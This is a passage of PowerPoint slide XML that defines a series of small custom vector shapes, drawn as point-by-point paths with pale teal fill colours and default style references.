                  <a:pt x="8" y="121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="7FBFBF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="CustomShape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608200" y="4343400"/>
            <a:ext cx="42480" cy="164880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t"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2" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="99"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="99"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="97"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="93"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="93CCCC"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="CustomShape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2611440" y="4344840"/>
            <a:ext cx="34560" cy="132840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="22" h="84">
                <a:moveTo>
                  <a:pt x="22" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22"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1" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="A8D8D8"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="CustomShape 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2612880" y="4344840"/>
            <a:ext cx="26640" cy="102960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17" h="65">
                <a:moveTo>
                  <a:pt x="17" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BCE5E5"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="CustomShape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2612880" y="4346640"/>
            <a:ext cx="21960" cy="74160"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14" h="47">
                <a:moveTo>
                  <a:pt x="14" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="D1F2F2"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="CustomShape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2614680" y="4348080"/>
            <a:ext cx="14040" cy="42480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9" h="27">
                <a:moveTo>
                  <a:pt x="9" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E5FFFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241" name="CustomShape 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2790720" y="4470480"/>
            <a:ext cx="21960" cy="20160"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14" h="13">
                <a:moveTo>
                  <a:pt x="7" y="13"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="13"/>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42" name="CustomShape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2725560" y="4470480"/>
            <a:ext cx="10800" cy="10800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7" h="7">
                <a:moveTo>
                  <a:pt x="3" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="6"/>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43" name="CustomShape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744640" y="4470480"/>
            <a:ext cx="7560" cy="10800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5" h="7">
                <a:moveTo>
                  <a:pt x="3" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="7"/>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244" name="CustomShape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2671920" y="4324320"/>
            <a:ext cx="29880" cy="145800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="19" h="92">
                <a:moveTo>
                  <a:pt x="6" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="92"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="56"/>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245" name="CustomShape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2827440" y="4305240"/>
            <a:ext cx="42480" cy="163080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="27" h="103">
                <a:moveTo>
                  <a:pt x="27" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="26" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="92"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="0"/>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246" name="CustomShape 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2671920" y="4332240"/>
            <a:ext cx="28080" cy="126720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t"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2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2"/>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247" name="CustomShape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2673360" y="4341960"/>
            <a:ext cx="21960" cy="109080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14" h="69">
                <a:moveTo>
                  <a:pt x="5" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="1"/>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248" name="CustomShape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2674800" y="4349880"/>
            <a:ext cx="18720" cy="88560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12" h="56">
                <a:moveTo>
                  <a:pt x="4" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="2"/>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249" name="CustomShape 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2674800" y="4357800"/>
            <a:ext cx="15480" cy="72720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10" h="46">
                <a:moveTo>
                  <a:pt x="4" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="35"/>
                </a:lnTo>
                <a:lnTo>
